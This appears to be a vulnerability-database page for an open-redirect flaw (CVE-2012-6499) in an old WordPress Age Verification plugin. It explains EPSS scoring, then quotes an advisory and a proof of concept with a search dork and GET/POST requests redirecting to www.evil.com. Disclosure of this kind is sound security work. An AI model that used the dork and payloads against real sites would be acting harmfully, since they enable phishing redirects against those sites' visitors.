CVE-2012-6499 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/51357/info WordPress Age Verification plugin is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. WordPress Age Verification plugin 0.4 and prior versions are vulnerable. http://www.example.com/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com

# Exploit Title: Wordpress Age Verification plugin <= 0.4 Open Redirect # Date: 2012/01/10 # Dork: inurl:wp-content/plugins/age-verification/age-verification.php # Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugin/age-verification.zip # Version: 0.4 1) Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com The rendered page will provide a link to http://www.evil.com 2) Via POST: http://server/wp-content/plugins/age-verification/age-verification.php redirect_to: http://www.evil.com age_day: 1 age_month: 1 age_year: 1970 Direct redirect to http://www.evil.com